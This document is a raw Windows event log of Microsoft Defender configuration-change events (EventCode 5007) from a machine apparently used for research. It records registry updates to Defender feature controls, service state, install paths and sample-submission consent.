Old value: Default\Signature Updates\EnableUpdateResiliency = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\EnableUpdateResiliency = 0x0
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=450
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\31 = 0x901
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=449
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\22 = 0x3E
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=448
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_4 = 0x1
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=447
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\10 = 0x1
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=446
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_9 = 0x1
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=445
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\32 = 0x36B0
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=444
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_7 = 0x1
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=443
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=442
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation = C:\Program Files\Windows Defender\
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation = C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\
11/14/2023 08:59:13 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=441
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/14/2023 08:59:11 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=440
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/14/2023 08:59:03 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=438
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/14/2023 08:59:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=437
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/14/2023 08:58:48 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=431
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Miscellaneous Configuration\BddUpdateFailure = 0x0
11/14/2023 08:58:48 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=430
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Miscellaneous Configuration\DeltaUpdateFailure = 0x0
11/14/2023 08:58:47 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=429
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\15 = 0x1
11/14/2023 08:58:47 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=428
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\13 = 0x1
11/14/2023 08:58:47 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=427
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\9 = 0x1
11/14/2023 08:58:47 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=426
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\7 = 0x1
11/14/2023 08:58:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=422
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\MpEngine\MpEngineRing = 0x2
New value:
11/14/2023 08:58:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=421
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\MpEngine\MpCampRing = 0x2
New value:
11/14/2023 07:06:31 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=259
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent = 0x0